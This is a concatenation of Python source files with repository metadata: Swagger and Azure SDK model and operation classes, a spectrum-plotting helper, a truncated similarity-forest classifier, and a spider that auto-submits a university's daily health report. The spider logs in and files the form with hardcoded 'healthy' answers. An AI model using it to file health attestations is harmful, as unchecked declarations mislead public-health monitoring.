"""Gets the setting_id of this SettingsIndividualSchema. # noqa: E501
:return: The setting_id of this SettingsIndividualSchema. # noqa: E501
:rtype: str
"""
return self._setting_id
@setting_id.setter
def setting_id(self, setting_id):
"""Sets the setting_id of this SettingsIndividualSchema.
:param setting_id: The setting_id of this SettingsIndividualSchema. # noqa: E501
:type: str
"""
self._setting_id = setting_id
@property
def value(self):
"""Gets the value of this SettingsIndividualSchema. # noqa: E501
:return: The value of this SettingsIndividualSchema. # noqa: E501
:rtype: str
"""
return self._value
@value.setter
def value(self, value):
"""Sets the value of this SettingsIndividualSchema.
:param value: The value of this SettingsIndividualSchema. # noqa: E501
:type: str
"""
self._value = value
@property
def explicit(self):
"""Gets the explicit of this SettingsIndividualSchema. # noqa: E501
:return: The explicit of this SettingsIndividualSchema. # noqa: E501
:rtype: bool
"""
return self._explicit
@explicit.setter
def explicit(self, explicit):
"""Sets the explicit of this SettingsIndividualSchema.
:param explicit: The explicit of this SettingsIndividualSchema. # noqa: E501
:type: bool
"""
self._explicit = explicit
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(SettingsIndividualSchema, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SettingsIndividualSchema):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 28.203704
| 89
| 0.578901
|
fd2a5c4ab2933d57694cdfb1a76cceacc6faab6e
| 5,170
|
py
|
Python
|
build/PureCloudPlatformClientV2/models/section.py
|
cjohnson-ctl/platform-client-sdk-python
|
38ce53bb8012b66e8a43cc8bd6ff00cf6cc99100
|
[
"MIT"
] | 10
|
2019-02-22T00:27:08.000Z
|
2021-09-12T23:23:44.000Z
|
libs/PureCloudPlatformClientV2/models/section.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | 5
|
2018-06-07T08:32:00.000Z
|
2021-07-28T17:37:26.000Z
|
libs/PureCloudPlatformClientV2/models/section.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | 6
|
2020-04-09T17:43:07.000Z
|
2022-02-17T08:48:05.000Z
|
# coding: utf-8
"""
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
import re
import json
from ..utils import sanitize_for_serialization
class Section(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
Section - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'field_list': 'list[FieldList]',
'instruction_text': 'str',
'key': 'str',
'state': 'str'
}
self.attribute_map = {
'field_list': 'fieldList',
'instruction_text': 'instructionText',
'key': 'key',
'state': 'state'
}
self._field_list = None
self._instruction_text = None
self._key = None
self._state = None
@property
def field_list(self):
"""
Gets the field_list of this Section.
:return: The field_list of this Section.
:rtype: list[FieldList]
"""
return self._field_list
@field_list.setter
def field_list(self, field_list):
"""
Sets the field_list of this Section.
:param field_list: The field_list of this Section.
:type: list[FieldList]
"""
self._field_list = field_list
@property
def instruction_text(self):
"""
Gets the instruction_text of this Section.
:return: The instruction_text of this Section.
:rtype: str
"""
return self._instruction_text
@instruction_text.setter
def instruction_text(self, instruction_text):
"""
Sets the instruction_text of this Section.
:param instruction_text: The instruction_text of this Section.
:type: str
"""
self._instruction_text = instruction_text
@property
def key(self):
"""
Gets the key of this Section.
:return: The key of this Section.
:rtype: str
"""
return self._key
@key.setter
def key(self, key):
"""
Sets the key of this Section.
:param key: The key of this Section.
:type: str
"""
self._key = key
@property
def state(self):
"""
Gets the state of this Section.
:return: The state of this Section.
:rtype: str
"""
return self._state
@state.setter
def state(self, state):
"""
Sets the state of this Section.
:param state: The state of this Section.
:type: str
"""
self._state = state
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_json(self):
"""
Returns the model as raw JSON
"""
return json.dumps(sanitize_for_serialization(self.to_dict()))
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 24.736842
| 77
| 0.551064
|
67d66d90e0b4c0998d6a63e938faf34b6af6a669
| 1,692
|
py
|
Python
|
health_report_helper/spider.py
|
why36/actions-NjuHealthReport
|
72f31024937362fa9b2e0039cf6f8ec2e817b78d
|
[
"MIT"
] | null | null | null |
health_report_helper/spider.py
|
why36/actions-NjuHealthReport
|
72f31024937362fa9b2e0039cf6f8ec2e817b78d
|
[
"MIT"
] | null | null | null |
health_report_helper/spider.py
|
why36/actions-NjuHealthReport
|
72f31024937362fa9b2e0039cf6f8ec2e817b78d
|
[
"MIT"
] | 4
|
2021-11-12T14:40:03.000Z
|
2022-03-01T10:33:54.000Z
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python
# Copyright 2020 zhangt2333. All Rights Reserved.
# Author-Github: github.com/zhangt2333
# spider.py 2021/9/11 13:01
import json
import requests
import config
from uniform_login.uniform_login_spider import login
import utils
def get_apply_list(cookies):
try:
response = requests.get(
url='http://ehallapp.nju.edu.cn/xgfw/sys/yqfxmrjkdkappnju/apply/getApplyInfoList.do',
headers=config.HEADERS,
cookies=cookies
)
data = json.loads(response.text)
return data['data']
except Exception as e:
print(e)
exit(-1)
def do_apply(cookies, WID, location):
try:
response = requests.get(
url='http://ehallapp.nju.edu.cn/xgfw/sys/yqfxmrjkdkappnju/apply/saveApplyInfos.do',
params=dict(
WID=WID,
IS_TWZC=1,
IS_HAS_JKQK=1,
JRSKMYS=1,
JZRJRSKMYS=1,
CURR_LOCATION=location
),
headers=config.HEADERS,
cookies=cookies
)
if not (response.status_code == 200 and '成功' in response.text):
raise Exception('健康填报失败')
except Exception as e:
print(e)
exit(-1)
def main(username, password, location):
# 登录
cookies = login(username, password, 'http://ehallapp.nju.edu.cn/xgfw/sys/yqfxmrjkdkappnju/apply/getApplyInfoList.do')
# 获取填报列表
apply_list = get_apply_list(cookies)
if not apply_list[0]['TBRQ'] == utils.get_GMT8_str('%Y-%m-%d'):
print('当日健康填报未发布')
exit(-1)
# 填报当天
do_apply(cookies, apply_list[0]['WID'], location)
| 28.677966
| 121
| 0.599291
|
4ff9b1033d63c8c8df3537409872f1c235c8461d
| 2,137
|
py
|
Python
|
alexmods/plot_spectrum.py
|
alexji/alexmods
|
702f933e717256c0f055288f5f7c7341ac19b126
|
[
"MIT"
] | 1
|
2018-06-02T09:47:31.000Z
|
2018-06-02T09:47:31.000Z
|
alexmods/plot_spectrum.py
|
alexji/alexmods
|
702f933e717256c0f055288f5f7c7341ac19b126
|
[
"MIT"
] | 3
|
2018-08-24T07:41:22.000Z
|
2018-10-29T15:54:17.000Z
|
alexmods/plot_spectrum.py
|
alexji/alexmods
|
702f933e717256c0f055288f5f7c7341ac19b126
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.ticker import MultipleLocator, ScalarFormatter
from .specutils import Spectrum1D
def plot_spectrum(spec, wlmin=None, wlmax=None, ax=None,
dxmaj=None, dxmin=None, dymaj=None, dymin=None,
fillcolor="#cccccc",fillalpha=1,
**kwargs):
if ax is None:
fig, ax = plt.subplots()
wave = spec.dispersion
flux = spec.flux
errs = spec.ivar**-0.5
ii = np.ones(len(wave), dtype=bool)
if wlmin is not None:
ii = ii & (wave > wlmin)
if wlmax is not None:
ii = ii & (wave < wlmax)
wave = wave[ii]
flux = flux[ii]
errs = errs[ii]
y1 = flux-errs
y2 = flux+errs
fill_between_steps(ax, wave, y1, y2, alpha=fillalpha, facecolor=fillcolor, edgecolor=fillcolor)
ax.plot(wave, flux, **kwargs)
ax.xaxis.set_major_formatter(ScalarFormatter(useOffset=False))
if dxmaj is not None: ax.xaxis.set_major_locator(MultipleLocator(dxmaj))
if dxmin is not None: ax.xaxis.set_minor_locator(MultipleLocator(dxmin))
if dymaj is not None: ax.yaxis.set_major_locator(MultipleLocator(dymaj))
if dymin is not None: ax.yaxis.set_minor_locator(MultipleLocator(dymin))
return ax
def fill_between_steps(ax, x, y1, y2=0, h_align='mid', **kwargs):
"""
Fill between for step plots in matplotlib.
**kwargs will be passed to the matplotlib fill_between() function.
"""
# First, duplicate the x values
xx = x.repeat(2)[1:]
# Now: the average x binwidth
xstep = np.repeat((x[1:] - x[:-1]), 2)
xstep = np.concatenate(([xstep[0]], xstep, [xstep[-1]]))
# Now: add one step at end of row.
xx = np.append(xx, xx.max() + xstep[-1])
# Make it possible to chenge step alignment.
if h_align == 'mid':
xx -= xstep / 2.
elif h_align == 'right':
xx -= xstep
# Also, duplicate each y coordinate in both arrays
y1 = y1.repeat(2)#[:-1]
if type(y2) == np.ndarray:
y2 = y2.repeat(2)#[:-1]
# now to the plotting part:
return ax.fill_between(xx, y1, y2=y2, **kwargs)
| 32.378788
| 99
| 0.628451
|
90c4dda54ed9eb6069d58e05469577e7938c5c2f
| 24,173
|
py
|
Python
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_09_01/aio/operations/_virtual_routers_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 3
|
2020-06-23T02:25:27.000Z
|
2021-09-07T18:48:11.000Z
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_09_01/aio/operations/_virtual_routers_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 510
|
2019-07-17T16:11:19.000Z
|
2021-08-02T08:38:32.000Z
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_09_01/aio/operations/_virtual_routers_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 5
|
2019-09-04T12:51:37.000Z
|
2020-09-16T07:28:40.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class VirtualRoutersOperations:
"""VirtualRoutersOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_09_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
virtual_router_name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
virtual_router_name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Deletes the specified Virtual Router.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
virtual_router_name=virtual_router_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}'} # type: ignore
async def get(
self,
resource_group_name: str,
virtual_router_name: str,
expand: Optional[str] = None,
**kwargs
) -> "_models.VirtualRouter":
"""Gets the specified Virtual Router.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualRouter, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_09_01.models.VirtualRouter
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouter"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualRouter', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
virtual_router_name: str,
parameters: "_models.VirtualRouter",
**kwargs
) -> "_models.VirtualRouter":
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouter"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'VirtualRouter')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VirtualRouter', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualRouter', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
virtual_router_name: str,
parameters: "_models.VirtualRouter",
**kwargs
) -> AsyncLROPoller["_models.VirtualRouter"]:
"""Creates or updates the specified Virtual Router.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param parameters: Parameters supplied to the create or update Virtual Router.
:type parameters: ~azure.mgmt.network.v2019_09_01.models.VirtualRouter
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either VirtualRouter or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_09_01.models.VirtualRouter]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouter"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_router_name=virtual_router_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualRouter', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}'} # type: ignore
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["_models.VirtualRouterListResult"]:
"""Lists all Virtual Routers in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualRouterListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_09_01.models.VirtualRouterListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualRouterListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters'} # type: ignore
def list(
self,
**kwargs
) -> AsyncIterable["_models.VirtualRouterListResult"]:
"""Gets all the Virtual Routers in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualRouterListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_09_01.models.VirtualRouterListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualRouterListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/virtualRouters'} # type: ignore
| 49.841237
| 197
| 0.668473
|
fdfe880e3ed0270c3310e163218726b56067b4da
| 8,243
|
py
|
Python
|
simforest/_simforest.py
|
Cich0sza/SimilarityForest
|
c245ed764f419f4bada4da418c7397aca08d90a7
|
[
"MIT"
] | 1
|
2019-05-27T00:32:01.000Z
|
2019-05-27T00:32:01.000Z
|
simforest/_simforest.py
|
Cich0sza/SimilarityForest
|
c245ed764f419f4bada4da418c7397aca08d90a7
|
[
"MIT"
] | null | null | null |
simforest/_simforest.py
|
Cich0sza/SimilarityForest
|
c245ed764f419f4bada4da418c7397aca08d90a7
|
[
"MIT"
] | 1
|
2019-05-27T12:50:58.000Z
|
2019-05-27T12:50:58.000Z
|
from collections import defaultdict, Counter
import numpy as np
import pandas as pd
class AxesSampler:
def __init__(self, y, rand: np.random.RandomState = None, r=1):
self.y = self._process_y(y)
self.rand = rand if rand is not None else np.random.RandomState()
self.r = r
self.current_r = 0
def __iter__(self):
return self
def __next__(self):
return self._next()
@staticmethod
def _process_y(y):
tmp = defaultdict(list)
for i, item in enumerate(y):
tmp[item].append(i)
return tmp
def _next(self):
if self.current_r < self.r:
self.current_r += 1
tmp = list(self.y)
first_class = self.rand.choice(tmp)
tmp.remove(first_class)
second_class = self.rand.choice(tmp)
return self.rand.choice(self.y[first_class]), self.rand.choice(self.y[second_class])
else:
raise StopIteration()
class Params:
def __init__(self, gini_q=1, x_i=None, x_j=None, split_point=0, similarities=None):
self.gini_q = gini_q
self.x_i = x_i
self.x_j = x_j
self.split_point = split_point
self.similarities = similarities
class Node:
def __init__(self, depth, similarity_function=np.dot, n_axes=1,
max_depth=None, random_state=None):
self._depth = depth
self._sim_function = similarity_function
self._r = n_axes
self._max_depth = max_depth
self._random = np.random.RandomState() if random_state is None else random_state
self._left: Node = None
self._right: Node = None
self._x_i = None
self._x_j = None
self._split_point = None
self.prediction = None
@staticmethod
def _split_gini(total_left, total_right, left_val: defaultdict, right_val: Counter):
left_gini = 1 - sum(left_val[key]**2 for key in left_val) / total_left**2
